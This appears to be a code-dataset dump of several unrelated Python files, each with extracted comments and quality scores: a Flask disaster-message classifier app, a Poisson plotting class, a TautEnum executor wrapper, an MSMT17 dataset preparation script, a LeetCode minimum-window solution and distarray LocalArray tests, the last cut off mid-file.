import pandas as pd
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from flask import Flask
from flask import render_template, request
from plotly.graph_objs import Bar
import re
import joblib
from sqlalchemy import create_engine
import json
import plotly
# initializing Flask app
app = Flask(__name__)
def tokenize(text):
"""
Tokenizes text data
Args:
text str: Messages as text data
Returns:
# clean_tokens list: Processed text after normalizing, tokenizing and lemmatizing
words list: Processed text after normalizing, tokenizing and lemmatizing
"""
# Normalize text
text = re.sub(r"[^a-zA-Z0-9]", " ", text.lower())
# tokenize text
words = word_tokenize(text)
# remove stop words
stopwords_ = stopwords.words("english")
words = [word for word in words if word not in stopwords_]
# extract root form of words
words = [WordNetLemmatizer().lemmatize(word, pos='v') for word in words]
return words
# load data
engine = create_engine('sqlite:///../data/DisasterResponse.db')
df = pd.read_sql_table('DisasterResponse', engine)
# load model
model = joblib.load("../models/classifier.pkl")
# index webpage displays cool visuals and receives user input text for model
@app.route('/')
@app.route('/index')
def index():
# Extract data needed for visuals
# count messsages based on whether genre is related or not
genre_related_counts = df[df['related'] == 1].groupby('genre')['message'].count()
genre_not_related_counts = df[df['related'] == 0].groupby('genre')['message'].count()
# label for the genre
genre_names = list(genre_related_counts.index)
# Calculate proportion of each category with label = 1
category_proportion = df[df.columns[4:]].sum()/len(df)
category_proportion = category_proportion.sort_values(ascending = False)
# category labels
category = list(category_proportion.index)
# create visuals
figures = [
{
'data': [
Bar(
x = genre_names,
y = genre_related_counts,
name = 'Genre: Related'
),
Bar(
x = genre_names,
y = genre_not_related_counts,
name = 'Genre: Not Related'
)
],
'layout': {
'title': 'Distribution of Messages by Genre and Related Status',
'xaxis': {
'title': "Genre"
}, 'yaxis': {
'title': "Count of Messages"
}, 'barmode': 'group'
}
},
{
'data': [
Bar(
x = category,
y = category_proportion
)
],
'layout': {
'title': 'Proportion of Messages <br> by Category',
'xaxis': {
'title': "Category",
'tickangle': -45,
'automargin': True
}, 'yaxis': {
'title': "Proportion",
'automargin': True
}
}
}
]
# encode plotly graphs in JSON
ids = ["figure-{}".format(i) for i, _ in enumerate(figures)]
figuresJSON = json.dumps(figures, cls=plotly.utils.PlotlyJSONEncoder)
# render web page with plotly figures
return render_template('master.html', ids=ids, figuresJSON=figuresJSON, data_set=df)
# web page that handles user query and displays model results
@app.route('/go')
def go():
# save user input in query
query = request.args.get('query', '')
# use model to predict classification for query
categories = df.columns[4:]
# print('categories data is',categories)
classification_labels = model.predict([query])[0]
classification_results = dict(zip(categories, classification_labels))
positive_results = [key.replace('_', ' ').title() for key,value in classification_results.items() if value == 1]
# print(positive_results, len(positive_results))
# print('classification result is',classification_results)
# This will render the go.html Please see that file.
return render_template('go.html',
query=query,
classification_result=classification_results,
positive_results = positive_results
)
def main():
app.run(host='0.0.0.0', port=3001, debug=True)
if __name__ == '__main__':
main()
| en | 0.679212 | # initializing Flask app Tokenizes text data
Args:
text str: Messages as text data
Returns:
# clean_tokens list: Processed text after normalizing, tokenizing and lemmatizing
words list: Processed text after normalizing, tokenizing and lemmatizing # Normalize text # tokenize text # remove stop words # extract root form of words # load data # load model # index webpage displays cool visuals and receives user input text for model # Extract data needed for visuals # count messsages based on whether genre is related or not # label for the genre # Calculate proportion of each category with label = 1 # category labels # create visuals # encode plotly graphs in JSON # render web page with plotly figures # web page that handles user query and displays model results # save user input in query # use model to predict classification for query # print('categories data is',categories) # print(positive_results, len(positive_results)) # print('classification result is',classification_results) # This will render the go.html Please see that file. | 3.002357 | 3 |
poisson.py | danielbandeir/ExpoPoisson | 1 | 6616830 | <filename>poisson.py<gh_stars>1-10
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
class poisson(object):
def __init__(self):
stopTimes = []
times = []
self.stopTimes = stopTimes
self.times = times
def importPoisson(self, enterArchive):
database = open('import/'+enterArchive+'.csv', 'r')
for count in database:
count = count.strip()
stop, time = count.split(',')
self.stopTimes.append(stop)
self.times.append(time)
self.stopTimes = sorted(self.stopTimes)
return self.stopTimes, self.times
database.close()
def plotGraphic(self):
fig = plt.figure(figsize=(10, 5))
ax = fig.add_subplot(1, 1, 1)
ax.step(self.times, self.stopTimes, label="Paradas")
ax.legend
ax.set_title("Poisson")
ax.set_xlabel("Tempo")
ax.set_ylabel("Paradas")
plt.show()
| <filename>poisson.py<gh_stars>1-10
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
class poisson(object):
def __init__(self):
stopTimes = []
times = []
self.stopTimes = stopTimes
self.times = times
def importPoisson(self, enterArchive):
database = open('import/'+enterArchive+'.csv', 'r')
for count in database:
count = count.strip()
stop, time = count.split(',')
self.stopTimes.append(stop)
self.times.append(time)
self.stopTimes = sorted(self.stopTimes)
return self.stopTimes, self.times
database.close()
def plotGraphic(self):
fig = plt.figure(figsize=(10, 5))
ax = fig.add_subplot(1, 1, 1)
ax.step(self.times, self.stopTimes, label="Paradas")
ax.legend
ax.set_title("Poisson")
ax.set_xlabel("Tempo")
ax.set_ylabel("Paradas")
plt.show()
| en | 0.769321 | # -*- coding: utf-8 -*- | 3.346785 | 3 |
dockstream/utils/execute_external/TautEnum.py | niladell/DockStream | 34 | 6616831 | <reponame>niladell/DockStream
from dockstream.utils.enums.taut_enum_enums import TautEnumEnum
from dockstream.utils.execute_external.execute import ExecutorBase
EE = TautEnumEnum()
class TautEnumExecutor(ExecutorBase):
"""For the execution of the "TautEnum" binary."""
def __init__(self, prefix_execution=None, binary_location=None):
super().__init__(prefix_execution=prefix_execution, binary_location=binary_location)
def execute(self, command: str, arguments: list, check=True, location=None):
# check, whether a proper executable is provided
if command not in [EE.TAUTENUM]:
raise ValueError("Parameter command must be an dictionary of the internal TautEnum executable list.")
return super().execute(command=command,
arguments=arguments,
check=check,
location=location)
def is_available(self):
# unfortunately, "TautEnum" does not seem to return a meaningful return value, so instead try to parse
# the "stdout" of the help message
try:
result = self.execute(command=EE.TAUTENUM,
arguments=[EE.TAUTENUM_HELP],
check=False)
if EE.TAUTENUM_HELP_IDENTIFICATION_STRING in result.stdout:
return True
return False
except Exception as e:
return False
| from dockstream.utils.enums.taut_enum_enums import TautEnumEnum
from dockstream.utils.execute_external.execute import ExecutorBase
EE = TautEnumEnum()
class TautEnumExecutor(ExecutorBase):
"""For the execution of the "TautEnum" binary."""
def __init__(self, prefix_execution=None, binary_location=None):
super().__init__(prefix_execution=prefix_execution, binary_location=binary_location)
def execute(self, command: str, arguments: list, check=True, location=None):
# check, whether a proper executable is provided
if command not in [EE.TAUTENUM]:
raise ValueError("Parameter command must be an dictionary of the internal TautEnum executable list.")
return super().execute(command=command,
arguments=arguments,
check=check,
location=location)
def is_available(self):
# unfortunately, "TautEnum" does not seem to return a meaningful return value, so instead try to parse
# the "stdout" of the help message
try:
result = self.execute(command=EE.TAUTENUM,
arguments=[EE.TAUTENUM_HELP],
check=False)
if EE.TAUTENUM_HELP_IDENTIFICATION_STRING in result.stdout:
return True
return False
except Exception as e:
return False | en | 0.803445 | For the execution of the "TautEnum" binary. # check, whether a proper executable is provided # unfortunately, "TautEnum" does not seem to return a meaningful return value, so instead try to parse # the "stdout" of the help message | 2.624691 | 3 |
prepare_msmt17.py | oganesManasian/Person_reID_baseline_pytorch | 0 | 6616832 | <reponame>oganesManasian/Person_reID_baseline_pytorch<gh_stars>0
import os
from shutil import copyfile, rmtree
from tqdm import tqdm
# Folder which contains 'msmt17_raw' folder which contains list_train.txt, list_val.txt,
# list_query.txt, list_gallery.txt files and train, test folders with images
data_raw_path = 'msmt17'
# Processing train and test
for src_folder, sections in [["train", ["train", "val"]],
["test", ["gallery", "query"]]]:
for section in sections:
with open(os.path.join(data_raw_path, "msmt17_raw", f"list_{section}.txt")) as f:
filenames = f.readlines()
print(f"In total {len(filenames)} files in folder {section}")
if os.path.isdir(os.path.join(data_raw_path, section)):
rmtree(os.path.join(data_raw_path, section))
os.mkdir(os.path.join(data_raw_path, section))
for filename in tqdm(filenames, desc=f"Processing section {section}"):
label, name = filename.split(" ")[0].split("/")
src_path = os.path.join(data_raw_path, "msmt17_raw", src_folder, label, name)
dir_path = os.path.join(data_raw_path, section, label)
if not os.path.isdir(dir_path):
os.mkdir(dir_path)
dst_path = os.path.join(dir_path, name)
copyfile(src_path, dst_path)
| import os
from shutil import copyfile, rmtree
from tqdm import tqdm
# Folder which contains 'msmt17_raw' folder which contains list_train.txt, list_val.txt,
# list_query.txt, list_gallery.txt files and train, test folders with images
data_raw_path = 'msmt17'
# Processing train and test
for src_folder, sections in [["train", ["train", "val"]],
["test", ["gallery", "query"]]]:
for section in sections:
with open(os.path.join(data_raw_path, "msmt17_raw", f"list_{section}.txt")) as f:
filenames = f.readlines()
print(f"In total {len(filenames)} files in folder {section}")
if os.path.isdir(os.path.join(data_raw_path, section)):
rmtree(os.path.join(data_raw_path, section))
os.mkdir(os.path.join(data_raw_path, section))
for filename in tqdm(filenames, desc=f"Processing section {section}"):
label, name = filename.split(" ")[0].split("/")
src_path = os.path.join(data_raw_path, "msmt17_raw", src_folder, label, name)
dir_path = os.path.join(data_raw_path, section, label)
if not os.path.isdir(dir_path):
os.mkdir(dir_path)
dst_path = os.path.join(dir_path, name)
copyfile(src_path, dst_path) | en | 0.863174 | # Folder which contains 'msmt17_raw' folder which contains list_train.txt, list_val.txt, # list_query.txt, list_gallery.txt files and train, test folders with images # Processing train and test | 2.589037 | 3 |
Ninja/Leetcode/76_Minimum_Window_Substring.py | cyandterry/Python-Study | 61 | 6616833 | <reponame>cyandterry/Python-Study
"""
Given a string S and a string T, find the minimum window in S which will contain all the characters in T in complexity O(n).
For example,
S = "ADOBECODEBANC"
T = "ABC"
Minimum window is "BANC".
Note:
If there is no such window in S that covers all characters in T, return the emtpy string "".
If there are multiple such windows, you are guaranteed that there will always be only one unique minimum window in S.
"""
class Solution:
# @return a string
def minWindow(self, S, T):
N = len(S)
M = len(T)
wanted = {}
found = {}
for char in T:
wanted[char] = wanted.get(char, 0) + 1
found[char] = 0
l = 0
res = ''
counter = 0
for r in range(N):
if S[r] not in wanted:
continue
found[S[r]] += 1
if found[S[r]] <= wanted[S[r]]:
counter += 1
if counter == M:
while l < r:
if S[l] not in wanted:
l += 1
continue
if found[S[l]] > wanted[S[l]]:
found[S[l]] -= 1
l += 1
continue
break
if not res or len(res) > r - l + 1:
res = S[l:r+1]
return res
# Note
# 1. Prepare for wo dict
# 2. Skip chars that we don't care, increase right bound
# 3. If current window contains all the chars we want(counter == M), stop and resize left bound
# 4. Skip chars that we don't care. If extra chars in found > wanted, skip them
# 5. break here
# 6. Calculate the current size
| """
Given a string S and a string T, find the minimum window in S which will contain all the characters in T in complexity O(n).
For example,
S = "ADOBECODEBANC"
T = "ABC"
Minimum window is "BANC".
Note:
If there is no such window in S that covers all characters in T, return the emtpy string "".
If there are multiple such windows, you are guaranteed that there will always be only one unique minimum window in S.
"""
class Solution:
# @return a string
def minWindow(self, S, T):
N = len(S)
M = len(T)
wanted = {}
found = {}
for char in T:
wanted[char] = wanted.get(char, 0) + 1
found[char] = 0
l = 0
res = ''
counter = 0
for r in range(N):
if S[r] not in wanted:
continue
found[S[r]] += 1
if found[S[r]] <= wanted[S[r]]:
counter += 1
if counter == M:
while l < r:
if S[l] not in wanted:
l += 1
continue
if found[S[l]] > wanted[S[l]]:
found[S[l]] -= 1
l += 1
continue
break
if not res or len(res) > r - l + 1:
res = S[l:r+1]
return res
# Note
# 1. Prepare for wo dict
# 2. Skip chars that we don't care, increase right bound
# 3. If current window contains all the chars we want(counter == M), stop and resize left bound
# 4. Skip chars that we don't care. If extra chars in found > wanted, skip them
# 5. break here
# 6. Calculate the current size | en | 0.836386 | Given a string S and a string T, find the minimum window in S which will contain all the characters in T in complexity O(n). For example, S = "ADOBECODEBANC" T = "ABC" Minimum window is "BANC". Note: If there is no such window in S that covers all characters in T, return the emtpy string "". If there are multiple such windows, you are guaranteed that there will always be only one unique minimum window in S. # @return a string # Note # 1. Prepare for wo dict # 2. Skip chars that we don't care, increase right bound # 3. If current window contains all the chars we want(counter == M), stop and resize left bound # 4. Skip chars that we don't care. If extra chars in found > wanted, skip them # 5. break here # 6. Calculate the current size | 3.918517 | 4 |
distarray/localapi/tests/paralleltest_localarray.py | sjperkins/distarray | 66 | 6616834 | <filename>distarray/localapi/tests/paralleltest_localarray.py
# encoding: utf-8
# ---------------------------------------------------------------------------
# Copyright (C) 2008-2014, IPython Development Team and Enthought, Inc.
# Distributed under the terms of the BSD License. See COPYING.rst.
# ---------------------------------------------------------------------------
import unittest
import numpy as np
from numpy.testing import assert_array_equal
from distarray import utils
from distarray.testing import (ParallelTestCase, assert_localarrays_allclose,
assert_localarrays_equal)
from distarray.localapi.localarray import LocalArray, ndenumerate, ones
from distarray.localapi.maps import Distribution
from distarray.localapi.error import InvalidDimensionError, IncompatibleArrayError
class TestInit(ParallelTestCase):
"""Is the __init__ method working properly?"""
def setUp(self):
self.dist_1d = Distribution.from_shape(comm=self.comm,
shape=(7,), grid_shape=(4,))
self.larr_1d = LocalArray(self.dist_1d, buf=None)
self.dist_2d = Distribution.from_shape(comm=self.comm,
shape=(16, 16), grid_shape=(4, 1))
self.larr_2d = LocalArray(self.dist_2d, buf=None)
def test_basic_1d(self):
"""Test basic LocalArray creation."""
self.assertEqual(self.larr_1d.global_shape, (7,))
self.assertEqual(self.larr_1d.dist, ('b',))
self.assertEqual(self.larr_1d.grid_shape, (4,))
self.assertEqual(self.larr_1d.comm_size, 4)
self.assertTrue(self.larr_1d.comm_rank in range(4))
self.assertEqual(len(self.larr_1d.distribution), 1)
self.assertEqual(self.larr_1d.global_shape, (7,))
if self.larr_1d.comm_rank == 3:
self.assertEqual(self.larr_1d.local_shape, (1,))
else:
self.assertEqual(self.larr_1d.local_shape, (2,))
self.assertEqual(self.larr_1d.ndarray.shape, self.larr_1d.local_shape)
self.assertEqual(self.larr_1d.ndarray.size, self.larr_1d.local_size)
self.assertEqual(self.larr_1d.local_size, self.larr_1d.local_shape[0])
self.assertEqual(self.larr_1d.ndarray.dtype, self.larr_1d.dtype)
def test_basic_2d(self):
"""Test basic LocalArray creation."""
self.assertEqual(self.larr_2d.global_shape, (16, 16))
self.assertEqual(self.larr_2d.dist, ('b', 'b'))
self.assertEqual(self.larr_2d.grid_shape, (4, 1))
self.assertEqual(self.larr_2d.comm_size, 4)
self.assertTrue(self.larr_2d.comm_rank in range(4))
self.assertEqual(len(self.larr_2d.distribution), 2)
self.assertEqual(self.larr_2d.grid_shape, (4, 1))
self.assertEqual(self.larr_2d.global_shape, (16, 16))
self.assertEqual(self.larr_2d.local_shape, (4, 16))
self.assertEqual(self.larr_2d.local_size,
np.array(self.larr_2d.local_shape).prod())
self.assertEqual(self.larr_2d.ndarray.shape, self.larr_2d.local_shape)
self.assertEqual(self.larr_2d.ndarray.size, self.larr_2d.local_size)
self.assertEqual(self.larr_2d.ndarray.dtype, self.larr_2d.dtype)
def test_localarray(self):
"""Can the ndarray be set and get?"""
self.larr_2d.ndarray
la = np.random.random(self.larr_2d.local_shape)
la = np.asarray(la, dtype=self.larr_2d.dtype)
self.larr_2d.ndarray = la
self.larr_2d.ndarray
def test_bad_localarray(self):
""" Test that setting a bad local array fails as expected. """
self.larr_1d.ndarray
local_shape = self.larr_1d.local_shape
# Double dimension sizes to make an invalid shape.
bad_shape = tuple(2 * size for size in local_shape)
la = np.random.random(bad_shape)
la = np.asarray(la, dtype=self.larr_1d.dtype)
with self.assertRaises(ValueError):
self.larr_1d.ndarray = la
def test_cart_coords(self):
"""Test getting the cart_coords attribute"""
actual_1d = self.larr_1d.cart_coords
expected_1d = tuple(self.larr_1d.distribution.cart_coords)
self.assertEqual(actual_1d, expected_1d)
actual_2d = self.larr_2d.cart_coords
expected_2d = tuple(self.larr_2d.distribution.cart_coords)
self.assertEqual(actual_2d, expected_2d)
class TestLocalInd(ParallelTestCase):
"""Test the computation of local indices."""
def test_block_simple(self):
"""Can we compute local indices for a block distribution?"""
distribution = Distribution.from_shape(comm=self.comm, shape=(4, 4))
la = LocalArray(distribution)
self.assertEqual(la.global_shape, (4, 4))
self.assertEqual(la.grid_shape, (4, 1))
self.assertEqual(la.local_shape, (1, 4))
row_result = [(0, 0), (0, 1), (0, 2), (0, 3)]
row = la.comm_rank
calc_row_result = [la.local_from_global((row, col)) for col in
range(la.global_shape[1])]
self.assertEqual(row_result, calc_row_result)
def test_block_complex(self):
"""Can we compute local indices for a block distribution?"""
distribution = Distribution.from_shape(comm=self.comm, shape=(8, 2))
la = LocalArray(distribution)
self.assertEqual(la.global_shape, (8, 2))
self.assertEqual(la.grid_shape, (4, 1))
self.assertEqual(la.local_shape, (2, 2))
expected_lis = [(0, 0), (0, 1), (1, 0), (1, 1)]
if la.comm_rank == 0:
gis = [(0, 0), (0, 1), (1, 0), (1, 1)]
elif la.comm_rank == 1:
gis = [(2, 0), (2, 1), (3, 0), (3, 1)]
elif la.comm_rank == 2:
gis = [(4, 0), (4, 1), (5, 0), (5, 1)]
elif la.comm_rank == 3:
gis = [(6, 0), (6, 1), (7, 0), (7, 1)]
result = [la.local_from_global(gi) for gi in gis]
self.assertEqual(result, expected_lis)
def test_cyclic_simple(self):
"""Can we compute local indices for a cyclic distribution?"""
distribution = Distribution.from_shape(comm=self.comm,
shape=(10,), dist={0: 'c'})
la = LocalArray(distribution)
self.assertEqual(la.global_shape, (10,))
self.assertEqual(la.grid_shape, (4,))
if la.comm_rank == 0:
gis = (0, 4, 8)
self.assertEqual(la.local_shape, (3,))
calc_result = [la.local_from_global((gi,)) for gi in gis]
result = [(0,), (1,), (2,)]
elif la.comm_rank == 1:
gis = (1, 5, 9)
self.assertEqual(la.local_shape, (3,))
calc_result = [la.local_from_global((gi,)) for gi in gis]
result = [(0,), (1,), (2,)]
elif la.comm_rank == 2:
gis = (2, 6)
self.assertEqual(la.local_shape, (2,))
calc_result = [la.local_from_global((gi,)) for gi in gis]
result = [(0,), (1,)]
elif la.comm_rank == 3:
gis = (3, 7)
self.assertEqual(la.local_shape, (2,))
calc_result = [la.local_from_global((gi,)) for gi in gis]
result = [(0,), (1,)]
self.assertEqual(result, calc_result)
def test_cyclic_complex(self):
"""Can we compute local indices for a cyclic distribution?"""
distribution = Distribution.from_shape(comm=self.comm,
shape=(8, 2), dist={0: 'c'})
la = LocalArray(distribution)
self.assertEqual(la.global_shape, (8, 2))
self.assertEqual(la.grid_shape, (4, 1))
self.assertEqual(la.local_shape, (2, 2))
expected_lis = [(0, 0), (0, 1), (1, 0), (1, 1)]
if la.comm_rank == 0:
gis = [(0, 0), (0, 1), (4, 0), (4, 1)]
elif la.comm_rank == 1:
gis = [(1, 0), (1, 1), (5, 0), (5, 1)]
elif la.comm_rank == 2:
gis = [(2, 0), (2, 1), (6, 0), (6, 1)]
elif la.comm_rank == 3:
gis = [(3, 0), (3, 1), (7, 0), (7, 1)]
result = [la.local_from_global(gi) for gi in gis]
self.assertEqual(result, expected_lis)
class TestGlobalInd(ParallelTestCase):
"""Test the computation of global indices."""
def round_trip(self, la):
for indices in utils.multi_for([range(s) for s in la.local_shape]):
gi = la.global_from_local(indices)
li = la.local_from_global(gi)
self.assertEqual(li, indices)
def test_block(self):
"""Can we go from global to local indices and back for block?"""
distribution = Distribution.from_shape(comm=self.comm, shape=(4, 4))
la = LocalArray(distribution)
self.round_trip(la)
def test_cyclic(self):
"""Can we go from global to local indices and back for cyclic?"""
distribution = Distribution.from_shape(comm=self.comm,
shape=(8, 8), dist=('c', 'n'))
la = LocalArray(distribution)
self.round_trip(la)
def test_crazy(self):
"""Can we go from global to local indices and back for a complex case?"""
distribution = Distribution.from_shape(comm=self.comm,
shape=(10, 100, 20),
dist=('b', 'c', 'n'))
la = LocalArray(distribution)
self.round_trip(la)
def test_global_limits_block(self):
"""Find the boundaries of a block distribution"""
d = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('b', 'n'))
a = LocalArray(d)
answers = [(0, 3), (4, 7), (8, 11), (12, 15)]
limits = a.global_limits(0)
self.assertEqual(limits, answers[a.comm_rank])
answers = 4 * [(0, 15)]
limits = a.global_limits(1)
self.assertEqual(limits, answers[a.comm_rank])
def test_global_limits_cyclic(self):
"""Find the boundaries of a cyclic distribution"""
d = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('c', 'n'))
a = LocalArray(d)
answers = [(0, 12), (1, 13), (2, 14), (3, 15)]
limits = a.global_limits(0)
self.assertEqual(limits, answers[a.comm_rank])
answers = 4 * [(0, 15)]
limits = a.global_limits(1)
self.assertEqual(limits, answers[a.comm_rank])
def test_bad_global_limits(self):
""" Test that invalid global_limits fails as expected. """
d = Distribution.from_shape(comm=self.comm, shape=(4, 4))
a = LocalArray(d)
with self.assertRaises(InvalidDimensionError):
a.global_limits(-1)
class TestRankCoords(ParallelTestCase):
""" Test the rank <--> coords methods. """
def round_trip(self, la, rank):
""" Test that given a rank, we can get the coords,
and then get back to the same rank. """
coords = la.coords_from_rank(rank)
# I am not sure what to expect for specific values for coords.
# Therefore the specific return value is not checked.
rank2 = la.rank_from_coords(coords)
self.assertEqual(rank, rank2)
def test_rank_coords(self):
""" Test that we can go from rank to coords and back. """
d = Distribution.from_shape(comm=self.comm, shape=(4, 4))
la = LocalArray(d)
max_size = self.comm.Get_size()
for rank in range(max_size):
self.round_trip(la, rank=rank)
class TestArrayConversion(ParallelTestCase):
""" Test array conversion methods. """
def setUp(self):
# On Python3, an 'int' gets converted to 'np.int64' on copy,
# so we force the numpy type to start with so we get back
# the same thing.
self.int_type = np.int64
self.distribution = Distribution.from_shape(comm=self.comm,
shape=(4,))
self.int_larr = LocalArray(self.distribution, dtype=self.int_type)
self.int_larr.fill(3)
def test_astype(self):
""" Test that astype() works as expected. """
# Convert int array to float.
float_larr = self.int_larr.astype(float)
for global_inds, value in ndenumerate(float_larr):
self.assertEqual(value, 3.0)
self.assertTrue(isinstance(value, float))
# No type specification for a copy.
# Should get same type as we started with.
int_larr2 = self.int_larr.astype(None)
for global_inds, value in ndenumerate(int_larr2):
self.assertEqual(value, 3)
self.assertTrue(isinstance(value, self.int_type))
class TestIndexing(ParallelTestCase):
def test_indexing_0(self):
"""Can we get and set local elements for a simple dist?"""
distribution = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('b', 'n'))
a = LocalArray(distribution)
b = LocalArray(distribution)
for global_inds, value in ndenumerate(a):
a.global_index[global_inds] = 0.0
for global_inds, value in ndenumerate(a):
b.global_index[global_inds] = a.global_index[global_inds]
for i, value in ndenumerate(a):
self.assertEqual(b.global_index[i], a.global_index[i])
self.assertEqual(a.global_index[i], 0.0)
def test_indexing_1(self):
"""Can we get and set local elements for a complex dist?"""
distribution = Distribution.from_shape(comm=self.comm,
shape=(16, 16, 2), dist=('c', 'b', 'n'))
a = LocalArray(distribution)
b = LocalArray(distribution)
for i, value in ndenumerate(a):
a.global_index[i] = 0.0
for i, value in ndenumerate(a):
b.global_index[i] = a.global_index[i]
for i, value in ndenumerate(a):
self.assertEqual(b.global_index[i], a.global_index[i])
self.assertEqual(a.global_index[i], 0.0)
def test_pack_unpack_index(self):
distribution = Distribution.from_shape(comm=self.comm,
shape=(16, 16, 2), dist=('c', 'b', 'n'))
a = LocalArray(distribution)
for global_inds, value in ndenumerate(a):
packed_ind = a.pack_index(global_inds)
self.assertEqual(global_inds, a.unpack_index(packed_ind))
class TestSlicing(ParallelTestCase):
comm_size = 2
def test_slicing(self):
distribution = Distribution.from_shape(self.comm,
(16, 16),
dist=('b', 'n'))
a = ones(distribution)
if self.comm.Get_rank() == 0:
dd00 = {"dist_type": 'b',
"size": 5,
"start": 0,
"stop": 3,
"proc_grid_size": 2,
"proc_grid_rank": 0}
dd01 = {"dist_type": 'n',
"size": 16}
new_distribution = Distribution(self.comm, [dd00, dd01])
rvals = a.global_index.get_slice((slice(5, None), slice(None)),
new_distribution=new_distribution)
assert_array_equal(rvals, np.ones((3, 16)))
elif self.comm.Get_rank() == 1:
dd10 = {"dist_type": 'b',
"size": 5,
"start": 3,
"stop": 5,
"proc_grid_size": 2,
"proc_grid_rank": 1}
dd11 = {"dist_type": 'n',
"size": 16}
new_distribution = Distribution(self.comm, [dd10, dd11])
rvals = a.global_index.get_slice((slice(None, 10), slice(None)),
new_distribution=new_distribution)
assert_array_equal(rvals, np.ones((2, 16)))
class TestLocalArrayMethods(ParallelTestCase):
ddpr = [
({'dist_type': 'c',
'block_size': 1,
'size': 4,
'start': 0,
'proc_grid_rank': 0,
'proc_grid_size': 2,
},
{'dist_type': 'c',
'block_size': 2,
'size': 8,
'start': 0,
'proc_grid_rank': 0,
'proc_grid_size': 2,
}),
({'dist_type': 'c',
'block_size': 1,
'size': 4,
'start': 0,
'proc_grid_rank': 0,
'proc_grid_size': 2,
},
{'dist_type': 'c',
'block_size': 2,
'size': 8,
'start': 2,
'proc_grid_rank': 1,
'proc_grid_size': 2,
}),
({'dist_type': 'c',
'block_size': 1,
'size': 4,
'start': 1,
'proc_grid_rank': 1,
'proc_grid_size': 2,
},
{'dist_type': 'c',
'block_size': 2,
'size': 8,
'start': 0,
'proc_grid_rank': 0,
'proc_grid_size': 2,
}),
({'dist_type': 'c',
'block_size': 1,
'size': 4,
'start': 1,
'proc_grid_rank': 1,
'proc_grid_size': 2,
},
{'dist_type': 'c',
'block_size': 2,
'size': 8,
'start': 2,
'proc_grid_rank': 1,
'proc_grid_size': 2,
})
]
def test_copy_bn(self):
distribution = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('b', 'n'))
a = LocalArray(distribution, dtype=np.int_)
a.fill(11)
b = a.copy()
assert_localarrays_equal(a, b, check_dtype=True)
def test_copy_cbc(self):
distribution = Distribution(comm=self.comm, dim_data=self.ddpr[self.comm.Get_rank()])
a = LocalArray(distribution, dtype=np.int_)
a.fill(12)
b = a.copy()
assert_localarrays_equal(a, b, check_dtype=True)
def test_astype_bn(self):
new_dtype = np.float32
d = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('b', 'n'))
a = LocalArray(d, dtype=np.int_)
a.fill(11)
b = a.astype(new_dtype)
assert_localarrays_allclose(a, b, check_dtype=False)
self.assertEqual(b.dtype, new_dtype)
self.assertEqual(b.ndarray.dtype, new_dtype)
def test_astype_cbc(self):
new_dtype = np.int8
d = Distribution(comm=self.comm, dim_data=self.ddpr[self.comm.Get_rank()])
a = LocalArray(d, dtype=np.int32)
a.fill(12)
b = a.astype(new_dtype)
assert_localarrays_allclose(a, b, check_dtype=False)
self.assertEqual(b.dtype, new_dtype)
self.assertEqual(b.ndarray.dtype, new_dtype)
def test_asdist_like(self):
"""Test asdist_like for success and failure."""
d = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('b', 'n'))
a = LocalArray(d)
b = LocalArray(d)
new_a = a.asdist_like(b)
self.assertEqual(id(a), id(new_a))
d2 = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('n', 'b'))
a = LocalArray(d)
b = LocalArray(d2)
self.assertRaises(IncompatibleArrayError, a.asdist_like, b)
class TestComm(ParallelTestCase):
def test_create_localarray(self):
# regression test for issue #144
dist = Distribution.from_shape(comm=self.comm,
shape=(16, 16), dist=('n', 'b'))
la = LocalArray(dist)
class TestNDEnumerate(ParallelTestCase):
"""Make sure we generate indices compatible with __getitem__."""
def test_ndenumerate(self):
d = Distribution.from_shape(comm=self.comm,
shape=(16, 16, 2), dist=('c', 'b', 'n'))
a = LocalArray(d)
for global_inds, value in ndenumerate(a):
a.global_index[global_inds] = 0.0
if __name__ == '__main__':
try:
unittest.main()
except SystemExit:
pass
| <filename>distarray/localapi/tests/paralleltest_localarray.py
# encoding: utf-8
# ---------------------------------------------------------------------------
# Copyright (C) 2008-2014, IPython Development Team and Enthought, Inc.
# Distributed under the terms of the BSD License. See COPYING.rst.
# ---------------------------------------------------------------------------
import unittest
import numpy as np
from numpy.testing import assert_array_equal
from distarray import utils
from distarray.testing import (ParallelTestCase, assert_localarrays_allclose,
assert_localarrays_equal)
from distarray.localapi.localarray import LocalArray, ndenumerate, ones
from distarray.localapi.maps import Distribution
from distarray.localapi.error import InvalidDimensionError, IncompatibleArrayError
class TestInit(ParallelTestCase):
"""Is the __init__ method working properly?"""
def setUp(self):
self.dist_1d = Distribution.from_shape(comm=self.comm,
shape=(7,), grid_shape=(4,))
self.larr_1d = LocalArray(self.dist_1d, buf=None)
self.dist_2d = Distribution.from_shape(comm=self.comm,
shape=(16, 16), grid_shape=(4, 1))
self.larr_2d = LocalArray(self.dist_2d, buf=None)
def test_basic_1d(self):
"""Test basic LocalArray creation."""
self.assertEqual(self.larr_1d.global_shape, (7,))
self.assertEqual(self.larr_1d.dist, ('b',))
self.assertEqual(self.larr_1d.grid_shape, (4,))
self.assertEqual(self.larr_1d.comm_size, 4)
self.assertTrue(self.larr_1d.comm_rank in range(4))
self.assertEqual(len(self.larr_1d.distribution), 1)
self.assertEqual(self.larr_1d.global_shape, (7,))
if self.larr_1d.comm_rank == 3:
self.assertEqual(self.larr_1d.local_shape, (1,))
else:
self.assertEqual(self.larr_1d.local_shape, (2,))
self.assertEqual(self.larr_1d.ndarray.shape, self.larr_1d.local_shape)
self.assertEqual(self.larr_1d.ndarray.size, self.larr_1d.local_size)
self.assertEqual(self.larr_1d.local_size, self.larr_1d.local_shape[0])
self.assertEqual(self.larr_1d.ndarray.dtype, self.larr_1d.dtype)
def test_basic_2d(self):
"""Test basic LocalArray creation."""
self.assertEqual(self.larr_2d.global_shape, (16, 16))
self.assertEqual(self.larr_2d.dist, ('b', 'b'))
self.assertEqual(self.larr_2d.grid_shape, (4, 1))
self.assertEqual(self.larr_2d.comm_size, 4)
self.assertTrue(self.larr_2d.comm_rank in range(4))
